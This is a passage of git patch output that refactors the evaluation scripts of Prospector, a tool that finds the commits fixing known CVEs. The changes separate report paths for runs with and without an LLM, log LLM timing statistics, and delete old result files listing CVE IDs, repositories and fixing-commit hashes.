dispatch_prospector_jobs(filename: str, selected_cves: str): """Dispatches jobs to the queue.""" dataset = load_dataset(INPUT_DATA_PATH + filename + ".csv") - dataset = dataset[:5] + dataset = dataset[:10] # Only run a subset of CVEs if the user supplied a selected set if len(selected_cves) != 0: dataset = [c for c in dataset if c[0] in selected_cves] + # Select the folder depending whether LLMs are used or not + folder_path = ( + PROSPECTOR_REPORT_LLM_PATH + if evaluation_config.prospector_settings.run_with_llm + else PROSPECTOR_REPORT_NO_LLM_PATH + ) + dispatched_jobs = 0 for cve in dataset: # Skip already existing reports - if os.path.exists(f"{PROSPECTOR_REPORT_PATH}{filename}/{cve[0]}.json"): + if os.path.exists(f"{folder_path}{filename}/{cve[0]}.json"): continue - # print( - # f"\n\n*********\n {cve[0]} ({dataset.index(cve)+1}/{len(dataset)})\n**********\n" - # ) - dispatched_jobs += 1 # Send them to Prospector to run @@ -342,7 +356,7 @@ def dispatch_prospector_jobs(filename: str, selected_cves: str): cve[0], cve[2], "json", - f"{PROSPECTOR_REPORT_PATH}{filename}/{cve[0]}.json", + f"{folder_path}{filename}/{cve[0]}.json", ), description="Prospector Job", id=cve[0], From 9402ba1f041f249ed8bb97da2d01c1c31aa9dd3c Mon Sep 17 00:00:00 2001 From: I748376 Date: Mon, 22 Jul 2024 15:19:20 +0000 Subject: [PATCH 051/130] moves functions to extract version intervals from cves to utils --- prospector/evaluation/analyse.py | 132 +++++++------------------ prospector/evaluation/config.yaml | 8 +- prospector/evaluation/dispatch_jobs.py | 19 ++-- prospector/evaluation/utils.py | 86 ++++++++++++++++ 4 files changed, 134 insertions(+), 111 deletions(-) diff --git a/prospector/evaluation/analyse.py b/prospector/evaluation/analyse.py index 4fae74359..2640034e4 100644 --- a/prospector/evaluation/analyse.py +++ b/prospector/evaluation/analyse.py @@ -4,12 +4,10 @@ import sys from collections import defaultdict from typing import Dict, List, Tuple -from urllib.parse import urlparse import seaborn as sns from matplotlib import pyplot as plt -from datamodel.advisory import build_advisory_record from evaluation.dispatch_jobs import ( INPUT_DATA_PATH, PROSPECTOR_REPORT_PATH, @@ -133,7 +131,17 @@ def analyze_prospector(filename: str): # noqa: C901 ) # ID;URL;VERSIONS;FLAG;COMMITS;COMMENTS results, rulescount, skipped = write_matched_rules( - results, rulescount, skipped, itm, is_fix, has_certainty, commit_id, exists, position, ranks, rules + results, + rulescount, + skipped, + itm, + is_fix, + has_certainty, + commit_id, + exists, + position, + ranks, + rules, ) except FileNotFoundError: @@ -160,7 +168,6 @@ def analyze_prospector(filename: str): # noqa: C901 make_rules_plot(rulescount) - # Save the results to the Latex table table_data = [] for key, value in results.items(): @@ -174,7 +181,7 @@ def analyze_prospector(filename: str): # noqa: C901 ) total_check = sum([len(x) for x in results.values()]) - print(f"\nAnalysed {total_check} reports") # Sanity Check + print(f"\nAnalysed {total_check} reports") # Sanity Check if total_check != total: print("ERROR: Some CVEs are missing") @@ -183,11 +190,23 @@ def analyze_prospector(filename: str): # noqa: C901 def write_matched_rules( - results, rulescount, skipped, itm, is_fix, has_certainty, commit_id, exists, position, ranks, rules + results, + rulescount, + skipped, + itm, + is_fix, + has_certainty, + commit_id, + exists, + position, + ranks, + rules, ): - with open(ANALYSIS_RESULTS_PATH + 'matched_rules.tex', 'a+') as f: + with open(ANALYSIS_RESULTS_PATH + "matched_rules.tex", "a+") as f: if is_fix and has_certainty: # and 0 <= position < 10: - f.write(f"{itm[0]} & {' & '.join(build_table_row(rules))} & {' & '.join([str(x) for x in ranks]).replace('-1', '')} \\\\ \\midrule\n") + f.write( + f"{itm[0]} & {' & '.join(build_table_row(rules))} & {' & '.join([str(x) for x in ranks]).replace('-1', '')} \\\\ \\midrule\n" + ) results[has_certainty].add(itm[0]) @@ -195,14 +214,18 @@ def write_matched_rules( rulescount[rule] += 1 elif is_fix and not has_certainty and position == 0: - f.write(f"{itm[0]} & {' & '.join(build_table_row(rules))} & {' & '.join([str(x) for x in ranks]).replace('-1', '')} \\\\ \\midrule\n") + f.write( + f"{itm[0]} & {' & '.join(build_table_row(rules))} & {' & '.join([str(x) for x in ranks]).replace('-1', '')} \\\\ \\midrule\n" + ) results["medium_confidence"].add(itm[0]) for rule in rules: rulescount[rule] += 1 elif is_fix and not has_certainty and 0 < position < 10: results["low_confidence"].add(itm[0]) - f.write(f"{itm[0]} & {' & '.join(build_table_row(rules))} & {' & '.join([str(x) for x in ranks]).replace('-1', '')} \\\\ \\midrule\n") + f.write( + f"{itm[0]} & {' & '.join(build_table_row(rules))} & {' & '.join([str(x) for x in ranks]).replace('-1', '')} \\\\ \\midrule\n" + ) for rule in rules: rulescount[rule] += 1 @@ -255,7 +278,7 @@ def make_rules_plot(rulescount): hue=list(rulescount.keys()), palette=colors, width=0.6, - legend=False + legend=False, ) plt.xticks(rotation="vertical") # ss.set_xscale("log", base=2) @@ -277,8 +300,8 @@ def sum_relevances(list_of_rules): def check_report_get_rules(dataset, cve, fixing_commits): - """Retrieves the matched rules and commit information for a given CVE and a list of - fixing commits. + """Retrieves the matched rules and commit information for a given CVE and a + list of fixing commits. Args: dataset (str): The path to the dataset directory. @@ -548,89 +571,6 @@ def analyze_rules_usage(dataset_path: str, cve: str = ""): print(f"{k}: {v}") -def is_real_version(text: str): - return bool(re.match(r"\d+\.(?:\d+\.*)*\d", text)) - - -VULN = ["version", "through", "versions"] - -FIXED = [ - "before", - "before release", - "before version", - "prior to", - "upgrade to", - "fixed in", - "fixed in version", - "fixed in release", - "to version", -] - - -def get_version_spacy(text: str, nlp): - """This function extracts vulnerable and fixed version numbers from a given text using spaCy.""" - doc = nlp(text) - # relevant_sentences = {} - # relevant_sentence = "" - fixed_version = "" - vulnerable_version = "" - for i in range(len(doc))[1:]: - if is_real_version(doc[i].text): - if doc[i - 1].text in FIXED: - # relevant_sentence = doc[: i + 1] - fixed_version = doc[i].text - elif (doc[i - 2].text + " " + doc[i - 1].text) in FIXED: - # relevant_sentence = doc[: i + 1] - fixed_version = doc[i].text - elif ( - doc[i - 3].text + " " + doc[i - 2].text + " " + doc[i - 1].text - ) in FIXED: - # relevant_sentence = doc[: i + 1] - fixed_version = doc[i].text - else: - # relevant_sentence = doc[: i + 1] - vulnerable_version = doc[i].text - return vulnerable_version, fixed_version - - -def check_advisory(cve, repository=None, nlp=None): - """This function checks the advisory for a given CVE and attempts to extract version information.""" - advisory = build_advisory_record( - cve, nvd_rest_endpoint="http://localhost:8000/nvd/vulnerabilities/" - ) - references = [urlparse(r).netloc for r in advisory.references] - return references - vuln = "None" - if len(advisory.versions.get("affected")): - vuln = advisory.versions.get("affected")[-1] - - fixed = "None" - if len(advisory.versions.get("fixed")): - fixed = advisory.versions.get("fixed")[-1] - - vuln2, fixed2 = get_version_spacy(advisory.description, nlp) - res = [advisory.cve_id, advisory.description] - if fixed == fixed2 and vuln == vuln2: - res.append(f"{vuln}:{fixed}") - if fixed == "None" and fixed2 != "": - res.append(f"{vuln}:{fixed2}") - if vuln == "None" and vuln2 != "": - res.append(f"{vuln2}:{fixed}") - if fixed != fixed2 and fixed2 != "" and fixed != "None": - res.append(f"{vuln}:{fixed}") - res.append(f"{vuln}:{fixed2}") - - if len(res) > 2: - res.append("***************************************") - print(advisory.cve_id) - return res - else: - res.append(f"{vuln}:{fixed}") - res.append("***************************************") - print(advisory.cve_id) - return res - - def analyse_statistics(filename: str): # noqa: C901 """Analyses the Statistics field in each Prospector report of the CVEs contained in `filename`. diff --git a/prospector/evaluation/config.yaml b/prospector/evaluation/config.yaml index e11e6643a..d9370d3dd 100644 --- a/prospector/evaluation/config.yaml +++ b/prospector/evaluation/config.yaml @@ -2,13 +2,13 @@ input_data_path: evaluation/data/input/ # datasets to run prospector on (CSV: ID;URL;VERSIONS;FLAG;COMMITS;COMMENTS) # Prospector Reports -prospector_reports_path: evaluation/data/reports/ # reports generated by Prospector, sorted by names of input datasets +prospector_reports_llm_path: evaluation/data/reports_with_llm/ # reports generated by Prospector, sorted by names of input datasets +prospector_reports_no_llm_path: evaluation/data/reports_without_llm/ # reports generated by Prospector, sorted by names of input datasets # Analysis Results -analysis_results_llm_path: evaluation/data/results_with_llm/ -analysis_results_no_llm_path: evaluation/data/results_without_llm/ +analysis_results_path: evaluation/data/results/ # Prospector settings prospector_settings: run_containerised: True - run_with_llm: True \ No newline at end of file + run_with_llm: False \ No newline at end of file diff --git a/prospector/evaluation/dispatch_jobs.py b/prospector/evaluation/dispatch_jobs.py index 076438f2e..f5e9b0072 100644 --- a/prospector/evaluation/dispatch_jobs.py +++ b/prospector/evaluation/dispatch_jobs.py @@ -22,8 +22,12 @@ evaluation_config = OmegaConf.load("evaluation/config.yaml") INPUT_DATA_PATH = evaluation_config.input_data_path -PROSPECTOR_REPORT_LLM_PATH = evaluation_config.prospector_reports_llm_path -PROSPECTOR_REPORT_NO_LLM_PATH = evaluation_config.prospector_reports_no_llm_path +# Select the folder depending whether LLMs are used or not +PROSPECTOR_REPORT_PATH = ( + evaluation_config.prospector_reports_llm_path + if evaluation_config.prospector_settings.run_with_llm + else evaluation_config.prospector_reports_no_llm_path +) ANALYSIS_RESULTS_PATH = evaluation_config.analysis_results_path # get the redis server url @@ -331,17 +335,10 @@ def dispatch_prospector_jobs(filename: str, selected_cves: str): if len(selected_cves) != 0: dataset = [c for c in dataset if c[0] in selected_cves] - # Select the folder depending whether LLMs are used or not - folder_path = ( - PROSPECTOR_REPORT_LLM_PATH - if evaluation_config.prospector_settings.run_with_llm - else PROSPECTOR_REPORT_NO_LLM_PATH - ) - dispatched_jobs = 0 for cve in dataset: # Skip already existing reports - if os.path.exists(f"{folder_path}{filename}/{cve[0]}.json"): + if os.path.exists(f"{PROSPECTOR_REPORT_PATH}{filename}/{cve[0]}.json"): continue dispatched_jobs += 1 @@ -356,7 +353,7 @@ def dispatch_prospector_jobs(filename: str, selected_cves: str): cve[0], cve[2], "json", - f"{folder_path}{filename}/{cve[0]}.json", + f"{PROSPECTOR_REPORT_PATH}{filename}/{cve[0]}.json", ), description="Prospector Job", id=cve[0], diff --git a/prospector/evaluation/utils.py b/prospector/evaluation/utils.py index 418e8935a..90b9edfa0 100644 --- a/prospector/evaluation/utils.py +++ b/prospector/evaluation/utils.py @@ -1,7 +1,93 @@ import csv +import re +from datamodel.advisory import build_advisory_record +from urllib.parse import urlparse + + +VULN = ["version", "through", "versions"] + +FIXED = [ + "before", + "before release", + "before version", + "prior to", + "upgrade to", + "fixed in", + "fixed in version", + "fixed in release", + "to version", +] def load_dataset(path: str): with open(path, "r") as file: reader = csv.reader(file, delimiter=";") return [row for row in reader if "CVE" in row[0] and row[3] != "True"] + + +def is_real_version(text: str): + return bool(re.match(r"\d+\.(?:\d+\.*)*\d", text)) + + +def get_version_spacy(text: str, nlp): + """This function extracts vulnerable and fixed version numbers from a given text using spaCy.""" + doc = nlp(text) + # relevant_sentences = {} + # relevant_sentence = "" + fixed_version = "" + vulnerable_version = "" + for i in range(len(doc))[1:]: + if is_real_version(doc[i].text): + if doc[i - 1].text in FIXED: + # relevant_sentence = doc[: i + 1] + fixed_version = doc[i].text + elif (doc[i - 2].text + " " + doc[i - 1].text) in FIXED: + # relevant_sentence = doc[: i + 1] + fixed_version = doc[i].text + elif ( + doc[i - 3].text + " " + doc[i - 2].text + " " + doc[i - 1].text + ) in FIXED: + # relevant_sentence = doc[: i + 1] + fixed_version = doc[i].text + else: + # relevant_sentence = doc[: i + 1] + vulnerable_version = doc[i].text + return vulnerable_version, fixed_version + + +def check_advisory(cve, repository=None, nlp=None): + """This function checks the advisory for a given CVE and attempts to extract version information.""" + advisory = build_advisory_record( + cve, nvd_rest_endpoint="http://localhost:8000/nvd/vulnerabilities/" + ) + references = [urlparse(r).netloc for r in advisory.references] + return references + vuln = "None" + if len(advisory.versions.get("affected")): + vuln = advisory.versions.get("affected")[-1] + + fixed = "None" + if len(advisory.versions.get("fixed")): + fixed = advisory.versions.get("fixed")[-1] + + vuln2, fixed2 = get_version_spacy(advisory.description, nlp) + res = [advisory.cve_id, advisory.description] + if fixed == fixed2 and vuln == vuln2: + res.append(f"{vuln}:{fixed}") + if fixed == "None" and fixed2 != "": + res.append(f"{vuln}:{fixed2}") + if vuln == "None" and vuln2 != "": + res.append(f"{vuln2}:{fixed}") + if fixed != fixed2 and fixed2 != "" and fixed != "None": + res.append(f"{vuln}:{fixed}") + res.append(f"{vuln}:{fixed2}") + + if len(res) > 2: + res.append("***************************************") + print(advisory.cve_id) + return res + else: + res.append(f"{vuln}:{fixed}") + res.append("***************************************") + print(advisory.cve_id) + return res From 7727e0181dd2c386e4b65119d40fbfb8f11e3d59 Mon Sep 17 00:00:00 2001 From: I748376 Date: Tue, 23 Jul 2024 15:06:47 +0000 Subject: [PATCH 052/130] writes llm stats analysis to file --- prospector/evaluation/analyse.py | 61 +- .../evaluation/data/results/false_postive.txt | 27 - .../evaluation/data/results/matched_rules.tex | 1470 ----------------- .../data/results/plots/project-kb.png | Bin 159194 -> 0 bytes .../results/summary_execution_results.tex | 28 - 5 files changed, 37 insertions(+), 1549 deletions(-) delete mode 100644 prospector/evaluation/data/results/false_postive.txt delete mode 100644 prospector/evaluation/data/results/matched_rules.tex delete mode 100644 prospector/evaluation/data/results/plots/project-kb.png delete mode 100644 prospector/evaluation/data/results/summary_execution_results.tex diff --git a/prospector/evaluation/analyse.py b/prospector/evaluation/analyse.py index 2640034e4..4ec0cd141 100644 --- a/prospector/evaluation/analyse.py +++ b/prospector/evaluation/analyse.py @@ -1,4 +1,5 @@ import csv +from datetime import datetime import json import re import sys @@ -605,7 +606,7 @@ def analyse_statistics(filename: str): # noqa: C901 total_cc_times.append(total_cc_time) except FileNotFoundError: - print(f"Skipped {itm[0]}.json because file could not be found.") + # print(f"Skipped {itm[0]}.json because file could not be found.") # Sanity Check missing.append(itm[0]) skipped += 1 @@ -631,19 +632,31 @@ def analyse_statistics(filename: str): # noqa: C901 except FileNotFoundError: continue - print( - # f"Found {len(dataset)} files in input dataset. \n{skipped} reports were missing: {missing}." - f"Found {len(dataset)} files in input dataset. \n{skipped} reports were missing." - ) + execution_data = { + "timestamp": datetime.now().strftime("%H:%M:%S"), + "total_files_found": len(repo_times), + "missing_reports": len(missing), + "skipped_reports": skipped, + "timings": { + "avg_time_repo_url": avg_repo_time, + "avg_time_commit_classification_single": avg_cc_time, + "avg_time_commit_classification_all": avg_total_cc_time, + }, + } - print("\nIn these reports, the LLM invokation needed the following times:") - print(f"Average time to get repository URL: \t\t\t\t{avg_repo_time}") - print( - f"Average time to get commit classification (single request): \t{avg_cc_time}" - ) - print( - f"Average time to get commit classification (all {cc_num_commits} requests): \t{avg_total_cc_time}" - ) + # Load existing data or create new structure + try: + with open(ANALYSIS_RESULTS_PATH + "llm_stats.json", "r") as f: + data = json.load(f) + except FileNotFoundError: + data = {"executions": []} + + # Add the new execution data + data["executions"].append(execution_data) + + # Save the updated data + with open(ANALYSIS_RESULTS_PATH + "llm_stats.json", "w") as f: + json.dump(data, f, indent=2) def process_llm_statistics(filepath: str) -> Tuple[float, float, float]: @@ -660,24 +673,24 @@ def process_llm_statistics(filepath: str) -> Tuple[float, float, float]: data = json.load(file) try: - llm_stats = data["processing_statistics"]["LLM"]["llm"][ - "llm_service" - ]["LLMService"] + llm_stats = data["processing_statistics"]["LLM"] - total_cc_time = sum(llm_stats["classify_commit"]["execution time"]) + total_cc_time = sum( + llm_stats["commit_classification"]["execution time"] + ) avg_cc_time = total_cc_time / len( - llm_stats["classify_commit"]["execution time"] + llm_stats["commit_classification"]["execution time"] ) return ( - llm_stats["get_repository_url"]["execution time"][0], + llm_stats["repository_url"]["execution time"][0], avg_cc_time, total_cc_time, ) - except Exception: - print(f"Did not have expected JSON fields: {filepath}.") + except Exception as e: + print(f"Did not have expected JSON fields: {filepath}: {e}") raise ValueError @@ -687,9 +700,9 @@ def get_cc_num_commits(filepath): data = json.load(file) num = len( - data["processing_statistics"]["LLM"]["llm"]["llm_service"][ - "LLMService" - ]["classify_commit"]["execution time"] + data["processing_statistics"]["LLM"]["commit_classification"][ + "execution time" + ] ) return num diff --git a/prospector/evaluation/data/results/false_postive.txt b/prospector/evaluation/data/results/false_postive.txt deleted file mode 100644 index acb7e4238..000000000 --- a/prospector/evaluation/data/results/false_postive.txt +++ /dev/null @@ -1,27 +0,0 @@ -"CVE-2012-2098;https://github.com/apache/commons-compress;None:None;False;8f702469cbf4c451b6dea349290bc4af0f6f76c7,fdd7459bc5470e90024dbe762249166481cce769,0600296ab8f8a0bbdfedd483f51b38005eb8e34e;" -CVE-2012-6708;https://github.com/jquery/jquery;None:None;False;05531fc4080ae24070930d15ae0cea7ae056457d; -CVE-2014-0086;https://github.com/richfaces4/core;None:None;False;71687cef6a83f4f9b4430648e4bf06bb7653434b; -"CVE-2014-4172;https://github.com/apereo/java-cas-client;None:None;False;ab6cbdc3daa451b4fef89c0bd0f4e6568f3aa9ef,9de2be91a2ed4f013900cb1facd4036c2f34d051,ae37092100c8eaec610dab6d83e5e05a8ee58814;" -"CVE-2015-0286;https://github.com/openssl/openssl;None:None;False;e677e8d13595f7b3287f8feef7676feb301b0e8a,c3c7fb07dc975dc3c9de0eddb7d8fd79fc9c67c1,02758836731658381580e282ff403ba07d87b2f8,497d0b00dca876beb6c81f2ea6d7160897434c2e,c982285ab63adeb473197d54d246d120bf60778b; identified more twins" -"CVE-2015-0290;https://github.com/openssl/openssl;None:None;False;1d2a18dc5a3b3363e17db5af8b6b0273856ac077,77c77f0a1b9f15b869ca3342186dfbedd1119d0e;" -CVE-2015-3996;https://github.com/AFNetworking/AFNetworking;None:None;False;3e631b203dd95bb82dfbcc2c47a2d84b59d1eeb4; -CVE-2015-7337;https://github.com/ipython/ipython;None:None;False;0a8096adf165e2465550bd5893d7e352544e5967; -CVE-2015-9241;https://github.com/hapijs/hapi;None:None;False;aab2496e930dce5ee1ab28eecec94e0e45f03580; -"CVE-2012-2098;https://github.com/apache/commons-compress;None:None;False;8f702469cbf4c451b6dea349290bc4af0f6f76c7,fdd7459bc5470e90024dbe762249166481cce769,0600296ab8f8a0bbdfedd483f51b38005eb8e34e;" -CVE-2012-6708;https://github.com/jquery/jquery;None:None;False;05531fc4080ae24070930d15ae0cea7ae056457d; -CVE-2014-0086;https://github.com/richfaces4/core;None:None;False;71687cef6a83f4f9b4430648e4bf06bb7653434b; -"CVE-2014-4172;https://github.com/apereo/java-cas-client;None:None;False;ab6cbdc3daa451b4fef89c0bd0f4e6568f3aa9ef,9de2be91a2ed4f013900cb1facd4036c2f34d051,ae37092100c8eaec610dab6d83e5e05a8ee58814;" -"CVE-2015-0286;https://github.com/openssl/openssl;None:None;False;e677e8d13595f7b3287f8feef7676feb301b0e8a,c3c7fb07dc975dc3c9de0eddb7d8fd79fc9c67c1,02758836731658381580e282ff403ba07d87b2f8,497d0b00dca876beb6c81f2ea6d7160897434c2e,c982285ab63adeb473197d54d246d120bf60778b; identified more twins" -"CVE-2015-0290;https://github.com/openssl/openssl;None:None;False;1d2a18dc5a3b3363e17db5af8b6b0273856ac077,77c77f0a1b9f15b869ca3342186dfbedd1119d0e;" -CVE-2015-3996;https://github.com/AFNetworking/AFNetworking;None:None;False;3e631b203dd95bb82dfbcc2c47a2d84b59d1eeb4; -CVE-2015-7337;https://github.com/ipython/ipython;None:None;False;0a8096adf165e2465550bd5893d7e352544e5967; -CVE-2015-9241;https://github.com/hapijs/hapi;None:None;False;aab2496e930dce5ee1ab28eecec94e0e45f03580; -"CVE-2012-2098;https://github.com/apache/commons-compress;None:None;False;8f702469cbf4c451b6dea349290bc4af0f6f76c7,fdd7459bc5470e90024dbe762249166481cce769,0600296ab8f8a0bbdfedd483f51b38005eb8e34e;" -CVE-2012-6708;https://github.com/jquery/jquery;None:None;False;05531fc4080ae24070930d15ae0cea7ae056457d; -CVE-2014-0086;https://github.com/richfaces4/core;None:None;False;71687cef6a83f4f9b4430648e4bf06bb7653434b; -"CVE-2014-4172;https://github.com/apereo/java-cas-client;None:None;False;ab6cbdc3daa451b4fef89c0bd0f4e6568f3aa9ef,9de2be91a2ed4f013900cb1facd4036c2f34d051,ae37092100c8eaec610dab6d83e5e05a8ee58814;" -"CVE-2015-0286;https://github.com/openssl/openssl;None:None;False;e677e8d13595f7b3287f8feef7676feb301b0e8a,c3c7fb07dc975dc3c9de0eddb7d8fd79fc9c67c1,02758836731658381580e282ff403ba07d87b2f8,497d0b00dca876beb6c81f2ea6d7160897434c2e,c982285ab63adeb473197d54d246d120bf60778b; identified more twins" -"CVE-2015-0290;https://github.com/openssl/openssl;None:None;False;1d2a18dc5a3b3363e17db5af8b6b0273856ac077,77c77f0a1b9f15b869ca3342186dfbedd1119d0e;" -CVE-2015-3996;https://github.com/AFNetworking/AFNetworking;None:None;False;3e631b203dd95bb82dfbcc2c47a2d84b59d1eeb4; -CVE-2015-7337;https://github.com/ipython/ipython;None:None;False;0a8096adf165e2465550bd5893d7e352544e5967; -CVE-2015-9241;https://github.com/hapijs/hapi;None:None;False;aab2496e930dce5ee1ab28eecec94e0e45f03580; diff --git a/prospector/evaluation/data/results/matched_rules.tex b/prospector/evaluation/data/results/matched_rules.tex deleted file mode 100644 index 3bba5f110..000000000 --- a/prospector/evaluation/data/results/matched_rules.tex +++ /dev/null @@ -1,1470 +0,0 @@ -CVE-2010-5312 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2011-4104 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & & & & & & /checkmark & 1 & 118 & & \\ \midrule -CVE-2011-4461 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & & & & 1 & 104 & & \\ \midrule -CVE-2011-4838 & /checkmark & & & & & & & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 174 & & \\ \midrule -CVE-2011-5036 & /checkmark & & & & & & & & & /checkmark & & & & & & /checkmark & 1 & 102 & & \\ \midrule -CVE-2012-1109 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 70 & & \\ \midrule -CVE-2012-1176 & /checkmark & & & & & & /checkmark & /checkmark & & /checkmark & & & & /checkmark & & & 1 & 150 & & \\ \midrule -CVE-2012-2139 & /checkmark & & & & & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 122 & & \\ \midrule -CVE-2012-2417 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & & 1 & 122 & & \\ \midrule -CVE-2012-3366 & /checkmark & & & & & & & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 108 & & \\ \midrule -CVE-2012-3408 & /checkmark & & & & & /checkmark & & & /checkmark & & & & & & & & 1 & 108 & & \\ \midrule -CVE-2012-3458 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule -CVE-2012-3865 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule -CVE-2012-4520 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & /checkmark & & & & & /checkmark & 1 & 122 & & \\ \midrule -CVE-2012-6550 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & 1 & 132 & & \\ \midrule -CVE-2012-6662 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2012-6685 & /checkmark & & & & & & & & & & & /checkmark & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2013-0256 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & 1 & 192 & & \\ \midrule -CVE-2013-0262 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 178 & & \\ \midrule -CVE-2013-0263 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 170 & & \\ \midrule -CVE-2013-0294 & /checkmark & & & & & /checkmark & & & & & & & & & & & 1 & 104 & & \\ \midrule -CVE-2013-1801 & /checkmark & & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 112 & & \\ \midrule -CVE-2013-1812 & /checkmark & & & & & & & /checkmark & & /checkmark & & /checkmark & & /checkmark & & & 1 & 146 & & \\ \midrule -CVE-2013-2013 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & /checkmark & & & 1 & 106 & & \\ \midrule -CVE-2013-2035 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & & 1 & 84 & & \\ \midrule -CVE-2013-2132 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & /checkmark & 1 & 126 & & \\ \midrule -CVE-2013-2191 & /checkmark & & & & & & & /checkmark & & /checkmark & & & & & & & 1 & 172 & & \\ \midrule -CVE-2013-3300 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 122 & & \\ \midrule -CVE-2013-4116 & /checkmark & & & & & & & & & /checkmark & & /checkmark & & /checkmark & & & 1 & 138 & & \\ \midrule -CVE-2013-4249 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule -CVE-2013-4353 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 188 & & \\ \midrule -CVE-2013-4413 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & /checkmark & & & /checkmark & & & 1 & 118 & & \\ \midrule -CVE-2013-4477 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 132 & & \\ \midrule -CVE-2013-4562 & /checkmark & & & & & & & /checkmark & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule -CVE-2013-4701 & /checkmark & & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 120 & & \\ \midrule -CVE-2013-5093 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule -CVE-2013-5123 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 102 & & \\ \midrule -CVE-2013-6044 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule -CVE-2013-6429 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule -CVE-2013-6430 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule -CVE-2013-6465 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 122 & & \\ \midrule -CVE-2013-7370 & /checkmark & & & & & & & & & & & & & & & & 1 & 96 & & \\ \midrule -CVE-2013-7397 & /checkmark & & & & & & /checkmark & & & /checkmark & & & & /checkmark & & /checkmark & 1 & 144 & & \\ \midrule -CVE-2013-7398 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & & 1 & 154 & & \\ \midrule -CVE-2013-7459 & /checkmark & & & & & & /checkmark & & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule -CVE-2014-0012 & /checkmark & & & & & & /checkmark & & & & /checkmark & & & & & & 2 & 108 & 138 & 138 \\ \midrule -CVE-2014-0072 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 124 & & \\ \midrule -CVE-2014-0073 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 112 & & \\ \midrule -CVE-2014-0110 & /checkmark & & & & & & & & & /checkmark & & & & & & /checkmark & 1 & 102 & & \\ \midrule -CVE-2014-0120 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & & 1 & 120 & & \\ \midrule -CVE-2014-0121 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule -CVE-2014-0177 & /checkmark & & & & & /checkmark & & & & /checkmark & & & & & & & 1 & 172 & & \\ \midrule -CVE-2014-0193 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule -CVE-2014-0225 & /checkmark & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & /checkmark & 1 & 118 & & \\ \midrule -CVE-2014-1202 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 96 & & \\ \midrule -CVE-2014-1402 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 2 & 124 & 150 & 150 \\ \midrule -CVE-2014-1403 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & & 1 & 180 & & \\ \midrule -CVE-2014-1604 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 112 & & \\ \midrule -CVE-2014-1830 & /checkmark & & & & & & /checkmark & & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule -CVE-2014-1832 & /checkmark & & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 112 & & \\ \midrule -CVE-2014-1858 & /checkmark & & & & & & & & & & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2014-1859 & /checkmark & & & & & & & & & & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule 